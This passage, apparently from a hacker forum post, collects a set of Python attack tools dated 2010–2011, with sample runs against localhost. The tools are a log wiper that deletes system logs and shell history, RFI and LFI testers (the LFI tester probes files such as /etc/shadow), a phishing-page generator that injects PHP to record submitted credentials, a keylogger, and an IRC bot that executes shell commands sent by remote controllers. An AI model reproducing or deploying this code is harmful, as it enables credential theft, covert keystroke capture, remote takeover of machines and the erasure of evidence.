"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]
 
comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']
 
print "\n[+] Starting the zapper"
 
for path in paths :
 try :
  os.delete(path)
 except :
  pass
 
for cmd in comandos :
 try:
  os.system(cmd)
 except:
  pass
 
print "[+] All logs are erased\n"
 
#The End ? 	
 
 

#!usr/bin/python
#RFI Tester (C) Doddy Hackman
 
import os,sys,urllib2,re
 
def header() : 
 print "\n--== RFI Tester ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
def test(web):
 try:
  print "\n[+] Testing vulnerability RFI in",web
  code = toma(web+"http://www.supertangas.com")
  if(re.findall("Los mejores TANGAS de la red",code,re.I)):
   print "[+] RFI Detected"
  else:
   print "[-] RFI Not Found" 
 except:
  pass
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 test(sys.argv[1])
 
copyright()
 
 
#The End
 

python rfi.py http://127.0.0.1/rfi.php?index=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#!usr/bin/python
#Phising Gen (C) Doddy Hackman
 
import urllib2,sys,os
 
 
def savefile(filename,text):
 file = open(filename,"w")
 file.write(text)
 
 
def header() : 
 print "\n\n--== Phising Gen ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
 
def gen(web,new):
 try:
  print "\n[+] Working in the phishing"
  code = toma(web) 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  print "[+] The fake was save in",new
  savefile(new,code+"\n\n"+text)
 except:
  pass
 
header()
 
if len(sys.argv) != 3 : 
 show()
 
else :
 gen(sys.argv[1],sys.argv[2])
 
copyright()
 
#The End	
 
 
 

C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010

#!usr/bin/perl
#LFI T00l (C) Doddy Hackman
 
import os,sys,urllib2,re
 
files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
 
def header() : 
 print "\n--== LFI T00l ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
 
def fuzz(web):
 print "\n[+] Fuzzing files...\n"
 for file in files:
  code = toma(web+file)
  if not (re.findall("No such file or directory in",code)):
   print "[File Found] : ",web,file
 
 
 
def test(web):
 try:
  print "\n[+] Testing vulnerability LFI in",web
  code = toma(web+"'")
  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
   print "\n[+] LFI Detected"
   print "[+] Full Path discloure : ",fpd[0]
   fuzz(web)
  else:
   print "[-] LFI Not Found" 
 except:
  pass
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 test(sys.argv[1])
 
copyright()
 
 
#The End
 

python lfi.py http://127.0.0.1/lfi.php?file=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011
 
import pyHook,pythoncom
 
 
def savefile(name,text):
 file = open(name,"a")
 file.write(text+"\n")
 file.close()
 
def toma(frase):
 savefile("logs.txt",frase.Key)
 
def capturar():
 nave = pyHook.HookManager()
 nave.KeyDown = toma
 nave.HookKeyboard()
 pythoncom.PumpMessages()
 
while 1:
 capturar()
 
# The End

cmdnow TUCOMANDO

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001
 
import re,socket
import subprocess
 
host = "127.0.0.1"
canal = "#locos"
nick = "bot"
 
irc = socket.socket()	
try:
 irc.connect((host,6667))
 irc.send("NICK "+nick+"\r\n")
 irc.send("USER "+nick+" 1 1 1 1\r\n")
 irc.send("JOIN "+canal+"\r\n")
 print "[+] Insane Bot Online\n"
 while 1:
  code = irc.recv(9999)
  if re.findall("PING",code):
   irc.send("PONG "+code.split()[1]+"\r\n")
  if re.findall("PRIVMSG",code):
   nick = code.split("!")
   nick = nick[0].replace(":","")
   msg = code.split(":")[2:][0]
   if re.findall("cmdnow",code):
    cmd = code.split("cmdnow")[1]
    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    if rea:
     re1 = rea.stdout.read()
     total = re1.replace("\n","|") 
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    else:
     re2 = rea.stderr.read()
     total = re2.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
 
 
except:
 print "\n\n[-] Error\n\n"
 
 
# The End
 

#!usr/bin/python
#Console (C) Doddy Hackman 2011
 
from Tkinter import *
import socket
 
global x,socket
 
def execa() :
 
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((str(host.get()),80))
 s.send(cmd.get()+"\r\n")
 data = s.recv(666)
 s.close()
 panel.insert(END,repr(data))
 
 
 
window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")
 
window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")
 
window.configure(background="black")
window.configure(cursor="tcross")
 
host = StringVar()
cmd = StringVar()
 
panel = Text(window,width=30,height=15,bg="black",fg="red")
 
Label(window,bg="black").grid(row=3)
 
Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)
 
Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)
 
Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)
 
 
Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)	
 
 
window.mainloop()